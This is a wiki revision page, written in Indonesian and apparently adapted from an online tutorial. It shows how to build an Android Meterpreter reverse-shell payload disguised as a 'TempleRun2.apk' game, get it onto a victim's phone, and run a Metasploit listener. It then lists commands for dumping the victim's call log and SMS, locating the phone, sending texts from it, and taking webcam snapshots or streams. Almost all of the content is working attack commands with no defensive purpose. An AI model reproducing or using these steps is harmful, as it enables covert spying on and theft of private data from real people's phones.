Difference between revisions of "MSF: Hack Call Log, SMS, Camera"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (Created page with "sumber: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/ 2015 we were using msfpayload and msfencode tools to perform this hac...") |
Onnowpurbo (talk | contribs) |
||
(One intermediate revision by the same user not shown) | |||
Line 1: | Line 1: | ||
sumber: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/ | sumber: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/ | ||
+ | Membuat payload | ||
− | + | msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 > TempleRun2.apk | |
− | + | apk file ada di | |
− | + | /root/Desktop/TempleRun2.apk | |
− | + | TempleRun2.apk perlu di masukan ke smartphone korban supaya kita bisa akses | |
− | + | ==Di Kali Linux== | |
− | |||
− | |||
− | + | Kita perlu set listener, jalankan | |
− | + | msfconsole | |
− | + | Jalankan | |
use exploit/multi/handler | use exploit/multi/handler | ||
Line 26: | Line 25: | ||
exploit | exploit | ||
− | + | Tunggu sambungan dari smartphone korban. | |
+ | |||
+ | ==Setelah tersambung ke korban== | ||
− | + | Beberapa perintah menarik | |
check_root | check_root | ||
− | + | cek apakah smartphone korban di root | |
− | |||
wlan_geolocate | wlan_geolocate | ||
− | + | tampikan lokasi smartphone di Google maps | |
− | |||
− | |||
− | |||
dump_calllog | dump_calllog | ||
− | + | download call log di file txt. ini akan tersimpan di | |
− | + | /root/calllog_dump.txt | |
− | |||
− | |||
− | |||
− | |||
dump_sms | dump_sms | ||
+ | download SMS disimpan di txt file | ||
− | + | send_sms -d “nomor tujuan” -t “berita yang ingin dikirim” | |
− | + | send_sms -d 9599***847 -t hacked | |
− | + | kirim SMS | |
− | |||
− | send_sms -d | ||
− | |||
− | |||
− | |||
− | |||
webcam_list | webcam_list | ||
− | + | tampilan daftar semua webcam yang ada di smartphone korban | |
− | |||
webcam_snap 2 | webcam_snap 2 | ||
+ | pilih webcam 2 | ||
− | + | webcam_stream | |
− | + | streaming dari webcam | |
− | webcam_stream | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
Latest revision as of 14:13, 22 April 2022
sumber: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/
Membuat payload
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 > TempleRun2.apk
apk file ada di
/root/Desktop/TempleRun2.apk
TempleRun2.apk perlu di masukan ke smartphone korban supaya kita bisa akses
Di Kali Linux
Kita perlu set listener, jalankan
msfconsole
Jalankan
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.0.102 set lport 4444 exploit
Tunggu sambungan dari smartphone korban.
Setelah tersambung ke korban
Beberapa perintah menarik
check_root cek apakah smartphone korban di root
wlan_geolocate tampikan lokasi smartphone di Google maps
dump_calllog download call log di file txt. ini akan tersimpan di /root/calllog_dump.txt
dump_sms download SMS disimpan di txt file
send_sms -d “nomor tujuan” -t “berita yang ingin dikirim” send_sms -d 9599***847 -t hacked kirim SMS
webcam_list tampilan daftar semua webcam yang ada di smartphone korban
webcam_snap 2 pilih webcam 2
webcam_stream streaming dari webcam